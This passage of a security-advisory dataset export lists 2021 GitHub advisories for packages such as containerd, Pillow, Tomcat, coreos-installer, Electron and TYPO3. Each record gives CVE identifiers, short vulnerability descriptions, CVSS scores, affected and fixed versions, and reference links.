'https://github.com/containerd/containerd/commit/5b46e404f6b9f661a205e28d59c982d3634148f8'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.4.11'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.7'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5002'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T17:05:03Z', 'nvd_published_at': '2021-10-04T17:15:00Z'}" +1.4.0,GHSA-4286-h47h-m5v6,2023-09-21T22:49:27Z,2021-10-25T19:43:24Z,,['CVE-2021-41745'],Showdoc File Upload Vulnerability,"A file upload vulnerability exists in Showdoc 2.8.3, which can be exploited by an attacker to gain server privileges.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41745'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/aec3df841958059c1db9ab1af25acc2af81e4e0e'}, {'type': 'WEB', 'url': 'https://github.com/purple-WL/SHOWDOC-file-upload-vulnerability'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://www.cnvd.org.cn/flaw/show/CNVD-2020-49480'}]","{'cwe_ids': ['CWE-287', 'CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:46:11Z', 'nvd_published_at': '2021-10-22T12:15:00Z'}" +1.4.0,GHSA-7534-mm45-c74v,2021-10-05T18:52:50Z,2021-10-05T20:24:41Z,,['CVE-2021-34552'],Buffer Overflow in Pillow,Pillow through 8.2.0 and PIL (aka Python Imaging Library) through 1.1.7 allow an attacker to pass controlled parameters directly into a convert function to trigger a buffer overflow in Convert.c.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34552'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5567'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/31c473898c29d1b7cb6555ce67d9503a4906b83f'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V6LCG525ARIX6LX5QRYNAWVDD2MD2SV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VUGBBT63VL7G4JNOEIPDJIOC34ZFBKNJ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.3.0.html#buffer-overflow'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/index.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202211-10'}]","{'cwe_ids': ['CWE-120'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:52:50Z', 'nvd_published_at': '2021-07-13T17:15:00Z'}" +1.4.0,GHSA-wph7-x527-w3h5,2022-02-08T20:42:53Z,2021-10-15T18:51:34Z,,['CVE-2021-42340'],Missing Release of Resource after Effective Lifetime in Apache Tomcat,"The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.0-M6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.1.0-M5'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.40'}, {'fixed': '9.0.54'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.60'}, {'fixed': '8.5.72'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42340'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10379'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8097a2d1550aa78e585fc77e602b9046e6d4099d8d132497c5387784@%3Ccommits.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r83a35be60f06aca2065f188ee542b9099695d57ced2e70e0885f905c%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211104-0001/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5009'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-772'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-15T13:59:01Z', 'nvd_published_at': '2021-10-14T20:15:00Z'}" +1.4.0,GHSA-g92x-8m54-p89v,2021-10-22T13:56:56Z,2021-10-21T17:48:55Z,,['CVE-2021-3858'],Cross-Site Request Forgery in snipe-it,snipe-it is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3858'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/84c73aae5dcafa9529ceeeda6e8cdda5a42129c3'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/releases/tag/v5.3.0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a2fac2eb-100d-45b1-9ac7-71847c2f2b6b'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:45:53Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}" +1.4.0,GHSA-q799-q27x-vp7w,2021-10-06T17:39:57Z,2021-10-12T22:23:21Z,,['CVE-2019-5064'],Out-of-bounds Write in OpenCV,"An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV, version 4.1.0 (corresponds with OpenCV-Python version 4.1.2.30). A specially crafted JSON file can cause a buffer overflow, resulting in multiple heap corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5064'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15857'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/32'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/releases/tag/4.2.0'}, {'type': 'WEB', 'url': 'https://talosintelligence.com/vulnerability_reports/TALOS-2019-0853'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:39:57Z', 'nvd_published_at': '2020-01-03T17:15:00Z'}" +1.4.0,GHSA-g67g-hvc3-xmvf,2021-10-14T18:50:58Z,2021-10-14T21:19:23Z,,['CVE-2021-41132'],Inconsistent input sanitisation leads to XSS vectors,"### Background + +A variety of templates do not perform proper sanitization through HTML escaping. +Due to the lack of sanitization and use of ``jQuery.html()``, there are a whole host of XSS possibilities with specially crafted input to a variety of fields. + +### Impact + +OMERO.web before 5.11.0 and OMERO.figure before 4.4.1. + +### Patches +Users should upgrade OMERO.web to 5.11.0 or higher and OMERO.figure to 4.4.1 or higher.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'omero-web'}, 'ecosystem_specific': {'affected_functions': ['omeroweb.webclient.views.load_metadata_preview']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.11.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'omero-figure'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ome/omero-web/security/advisories/GHSA-g67g-hvc3-xmvf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41132'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/commit/0168067accde5e635341b3c714b1d53ae92ba424'}, {'type': 'PACKAGE', 'url': 'https://github.com/ome/omero-web'}, {'type': 'WEB', 'url': 'https://www.openmicroscopy.org/security/advisories/2021-SV3/'}]","{'cwe_ids': ['CWE-116', 'CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-14T18:50:58Z', 'nvd_published_at': '2021-10-14T16:15:00Z'}" +1.4.0,GHSA-qcgx-crrx-38v5,2021-10-20T19:22:21Z,2021-10-13T18:54:09Z,,['CVE-2021-33609'],Denial of service in DataCommunicator class in Vaadin 8,Missing check in `DataCommunicator` class in `com.vaadin:vaadin-server` versions 8.0.0 through 8.14.0 (Vaadin 8.0.0 through 8.14.0) allows authenticated network attacker to cause heap exhaustion by requesting too many rows of data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.14.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-qcgx-crrx-38v5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33609'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12415'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/framework'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33609'}]","{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:39:24Z', 'nvd_published_at': '2021-10-13T11:15:00Z'}" +1.4.0,GHSA-q324-q795-2q5p,2021-10-11T18:40:44Z,2021-10-12T16:05:11Z,,[],Path traversal when using `preview-docs` when working dir contains files with question mark `?` in name,"### Impact +`preview-docs` command allows path traversal if current working dir contains files with question mark `?` in name and attacker knows the name. + +### Patches +It was patched starting from 1.0.0-beta.59 + +### Workarounds +Do not run openapi-cli preview-docs command in the folder which contains files with question mark `?` in name. + +### References +https://github.com/Redocly/openapi-cli/pull/347 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [@redocly/openapi-cli](https://github.com/Redocly/openapi-cli) +* Email us at [security@redocly.com](mailto:security@redocly.com) +",[],"[{'package': {'ecosystem': 'npm', 'name': '@redocly/openapi-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-beta.59'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-beta.58'}}]","[{'type': 'WEB', 'url': 'https://github.com/Redocly/openapi-cli/security/advisories/GHSA-q324-q795-2q5p'}, {'type': 'WEB', 'url': 'https://github.com/Redocly/openapi-cli/pull/347'}, {'type': 'PACKAGE', 'url': 'https://github.com/Redocly/openapi-cli'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T18:40:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-j28r-j54m-gpc4,2021-10-15T17:28:26Z,2021-10-05T17:53:59Z,,['CVE-2021-22557'],Code Injection in SLO Generator,SLO generator allows for loading of YAML files that if crafted in a specific format can allow for code execution within the context of the SLO Generator. We recommend upgrading SLO Generator past https://github.com/google/slo-generator/pull/173 ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'slo-generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22557'}, {'type': 'WEB', 'url': 'https://github.com/google/slo-generator/pull/173'}, {'type': 'WEB', 'url': 'https://github.com/google/slo-generator/commit/36318beab1b85d14bb860e45bea186b184690d5d'}, {'type': 'WEB', 'url': 'https://github.com/google/slo-generator/releases/tag/v2.0.1'}, {'type': 'PACKAGE', 'url': '://github.com/google/slo-generator'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164426/Google-SLO-Generator-2.0.0-Code-Execution.html'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T16:01:42Z', 'nvd_published_at': '2021-10-04T10:15:00Z'}" +1.4.0,GHSA-3r3g-g73x-g593,2022-06-01T21:25:06Z,2021-10-12T16:06:47Z,,['CVE-2021-20319'],coreos-installer improperly verifies GPG signature when decompressing gzipped artifact,"### Impact + +coreos-installer fails to correctly verify GPG signatures when decompressing gzip-compressed artifacts. This allows bypass of signature verification in cases where coreos-installer decompresses a downloaded OS image, allowing an attacker who can modify the OS image to compromise a newly-installed system. + +Default installations from ISO or PXE media in Fedora CoreOS, RHEL CoreOS, and RHEL for Edge are **not** affected, as coreos-installer installs from an OS image shipped as part of the install media. + +These flows are affected: + +1. Installing with `--image-file`, `--image-url`, or `coreos.inst.image_url`. For example, if a user has a local mirror of installation images, an attacker could replace an image with a gzip-compressed alternative (even if the file extension is `.xz`). The result: + + ``` + $ coreos-installer install --image-url http://localhost:8080/image.xz /dev/loop0 + Downloading image from http://localhost:8080/image.xz + Downloading signature from http://localhost:8080/image.xz.sig + > Read disk 749.9 MiB/749.9 MiB (100%) + gpg: Signature made Mon 20 Sep 2021 02:41:50 PM EDT + gpg: using RSA key 8C5BA6990BDB26E19F2A1A801161AE6945719A39 + gpg: BAD signature from ""Fedora (34) "" [ultimate] + Install complete. + ``` + + Notice that GPG reports a bad signature, but coreos-installer continues anyway. Automation that relies on coreos-installer's exit status will not notice either. + +2. `coreos-installer download --decompress --image-url`: + + ``` + $ coreos-installer download --decompress --image-url http://localhost:8080/image.xz + > Read disk 749.9 MiB/749.9 MiB (100%) + gpg: Signature made Mon 20 Sep 2021 02:41:50 PM EDT + gpg: using RSA key 8C5BA6990BDB26E19F2A1A801161AE6945719A39 + gpg: BAD signature from ""Fedora (34) "" [ultimate] + ./image + ``` + + Again, coreos-installer reports success. + +3. Installing with default parameters, when **not** installing from the image built into live ISO or PXE media, if the hosting service is compromised or if an active attacker gains control of the HTTPS response. + +4. `coreos-installer download --decompress` if the hosting service is compromised or if an active attacker gains control of the HTTPS response. + +### Patches + +The vulnerability is [fixed](https://github.com/coreos/coreos-installer/pull/659) in coreos-installer 0.10.1. + +### Workarounds + +For `coreos-installer download`, do not use the `-d` or `--decompress` options. + +For `coreos-installer install`, manually inspect the stderr output. If `BAD signature` appears, do not boot from the target disk. Note, however, that some OS services may have already accessed data on the compromised disk. + +### References + +For more information, see [PR 655](https://github.com/coreos/coreos-installer/pull/655). + +### For more information + +If you have any questions or comments about this advisory, [open an issue in coreos-installer](https://github.com/coreos/coreos-installer/issues/new/choose) or email the CoreOS [development mailing list](https://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'coreos-installer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/security/advisories/GHSA-3r3g-g73x-g593'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20319'}, {'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/pull/655'}, {'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/pull/659/commits/ad243c6f0eff2835b2da56ca5f7f33af76253c89'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2011862'}, {'type': 'PACKAGE', 'url': 'https://github.com/coreos/coreos-installer'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T21:17:04Z', 'nvd_published_at': '2022-03-04T18:15:00Z'}" +1.4.0,GHSA-x3r5-q6mj-m485,2021-10-19T18:04:34Z,2021-10-19T20:16:15Z,,['CVE-2021-41149'],Improper sanitization of target names,"### Impact +The tough library, prior to 0.12.0, does not properly sanitize target names when caching a repository, or when saving specific targets to an output directory. When targets are cached or saved, files could be overwritten with arbitrary content anywhere on the system. + +AWS would like to thank https://github.com/jku for reporting this issue. + +### Patches +A fix is available in version 0.12.0. + +### Workarounds +No workarounds to this issue are known. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tough'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/awslabs/tough/security/advisories/GHSA-x3r5-q6mj-m485'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41149'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}, {'type': 'PACKAGE', 'url': 'https://github.com/awslabs/tough'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T18:04:34Z', 'nvd_published_at': '2021-10-19T18:15:00Z'}" +1.4.0,GHSA-cq6w-w5rj-p9x8,2021-10-06T16:55:25Z,2021-10-06T17:47:05Z,,['CVE-2021-30109'],Cross-site Scripting in Froala Editor,"Froala Editor 3.2.6 is affected by Cross Site Scripting (XSS). Under certain conditions, a base64 crafted string leads to persistent Cross-site scripting (XSS) vulnerability within the hyperlink creation module.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'froala-editor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30109'}, {'type': 'WEB', 'url': 'https://github.com/Hackdwerg/CVE-2021-30109/blob/main/README.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/froala/wysiwyg-editor-release'}, {'type': 'WEB', 'url': 'http://froala.com'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:55:25Z', 'nvd_published_at': '2021-04-05T13:15:00Z'}" +1.4.0,GHSA-mpjm-v997-c4h4,2022-08-11T16:56:02Z,2021-10-12T21:59:13Z,,['CVE-2021-39184'],Electron's sandboxed renderers can obtain thumbnails of arbitrary files through the nativeImage API,"### Impact +This vulnerability allows a sandboxed renderer to request a ""thumbnail"" image of an arbitrary file on the user's system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases. + +All current stable versions of Electron are affected. + +### Patches +This was fixed with #30728, and the following Electron versions contain the fix: + +- 15.0.0-alpha.10 +- 14.0.0 +- 13.3.0 +- 12.1.0 +- 11.5.0 + +### Workarounds +If your app enables `contextIsolation`, this vulnerability is significantly more difficult for an attacker to exploit. + +Further, if your app does not depend on the `createThumbnailFromPath` API, then you can simply disable the functionality. In the main process, before the 'ready' event: +```js +delete require('electron').nativeImage.createThumbnailFromPath +``` + +### For more information +If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.5.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.1.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.0.0'}, {'fixed': '13.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-mpjm-v997-c4h4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39184'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/30728'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f'}, {'type': 'PACKAGE', 'url': 'https://github.com/electron/electron'}]","{'cwe_ids': ['CWE-668', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T18:54:44Z', 'nvd_published_at': '2021-10-12T19:15:00Z'}" +1.4.0,GHSA-qh9q-34h6-hcv9,2021-10-18T20:15:47Z,2021-10-12T18:48:24Z,,['CVE-2021-40978'],Directory traversal in mkdocs,"The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mkdocs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40978'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/issues/2601'}, {'type': 'WEB', 'url': 'https://github.com/nisdn/CVE-2021-40978/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/pull/2604'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/pull/2604/commits/cddc453c9d49298e60e7d56fb71130c151cbcbe5'}, {'type': 'PACKAGE', 'url': 'https://github.com/mkdocs/mkdocs'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/releases/tag/1.2.3'}, {'type': 'WEB', 'url': 'https://github.com/nisdn/CVE-2021-40978'}]","{'cwe_ids': ['CWE-12', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:41:01Z', 'nvd_published_at': '2021-10-07T14:15:00Z'}" +1.4.0,GHSA-3r9x-mjrm-2725,2021-10-08T22:09:39Z,2021-10-12T16:27:02Z,,['CVE-2020-28283'],Prototype pollution vulnerability in 'libnested',Prototype pollution vulnerability in 'libnested' versions 0.0.0 through 1.5.0 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'libnested'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}, {'last_affected': '1.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28283'}, {'type': 'PACKAGE', 'url': 'https://github.com/dominictarr/libnested'}, {'type': 'WEB', 'url': 'https://github.com/dominictarr/libnested/blob/d028a1b0f2e5f16fc28e568f52b936ae0bca0647/index.js#L27'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28284'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:09:39Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}" +1.4.0,GHSA-657m-v5vm-f6rw,2021-11-01T21:06:16Z,2021-10-05T20:23:47Z,,['CVE-2021-41113'],Cross-Site-Request-Forgery in Backend,"> ### Meta +> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (8.2) + +### Problem +It has been discovered that the new TYPO3 v11 feature that allows users to create and share [deep links in the backend user interface](https://typo3.org/article/typo3-version-112-escape-the-orbit#c12178) is vulnerable to cross-site-request-forgery. + +The impact is the same as described in [TYPO3-CORE-SA-2020-006 (CVE-2020-11069)](https://typo3.org/security/advisory/typo3-core-sa-2020-006). However, it is not limited to the same site context and does not require the attacker to be authenticated. In a worst case scenario, the attacker could create a new admin user account to compromise the system. + +To successfully carry out an attack, an attacker must trick his victim to access a compromised system. The victim must have an active session in the TYPO3 backend at that time. + +The following [Same-Site cookie settings](https://docs.typo3.org/c/typo3/cms-core/master/en-us/Changelog/8.7.x/Feature-90351-ConfigureTYPO3-shippedCookiesWithSameSiteFlag.html) in _$GLOBALS[TYPO3_CONF_VARS][BE][cookieSameSite]_ are required for an attack to be successful: + +* _SameSite=_***strict***: malicious evil.**example.org** invoking TYPO3 application at good.**example.org** +* _SameSite=_***lax*** or ***none***: malicious **evil.com** invoking TYPO3 application at **example.org** + +### Solution +Update your instance to TYPO3 version 11.5.0 which addresses the problem 